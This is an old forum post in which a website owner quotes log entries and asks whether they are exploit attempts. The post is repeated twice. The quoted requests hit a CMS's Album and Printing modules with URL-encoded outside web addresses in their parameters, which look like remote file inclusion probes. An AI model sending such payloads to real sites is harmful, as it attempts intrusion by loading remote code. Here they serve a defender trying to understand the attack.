Is someone attempting an exploit?
Posted: Mon Feb 04, 2008 5:13 pm
I run a counter/tracking script on my site and on reviewing the logs, there are a large number (150+) of entries from several hosts in the format:
/index.php?mact=Album,m5,default,1&
m5albumid=http%3A%2F%2Fwww.northfans.ch%2Fforum%2Fadmin%2Fsettings%2Fgucor%2Fujusu%2F&
amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;m5returnid=29&
amp;amp;amp;amp;amp;amp;amp;amp;amp;page=29
/index.php?mact=Printing,m5,printpage,1&m5showbutton=http%3A%2F%2Fwww.vacacionalhouse.com
%2Fen%2Fimg%2Fvohe%2Fseyon%2F&m5script=1&
m5returnid=22&page=22
mact is always album or printing and the url in the string is always different.
Is someone trying to get in through an exploit? The code is pretty specific but just returns the home page if entered.
Anything to worry about?
/index.php?mact=Album,m5,default,1&
m5albumid=http%3A%2F%2Fwww.northfans.ch%2Fforum%2Fadmin%2Fsettings%2Fgucor%2Fujusu%2F&
amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;m5returnid=29&
amp;amp;amp;amp;amp;amp;amp;amp;amp;page=29
/index.php?mact=Printing,m5,printpage,1&m5showbutton=http%3A%2F%2Fwww.vacacionalhouse.com
%2Fen%2Fimg%2Fvohe%2Fseyon%2F&m5script=1&
m5returnid=22&page=22
mact is always album or printing and the url in the string is always different.
Is someone trying to get in through an exploit? The code is pretty specific but just returns the home page if entered.
Anything to worry about?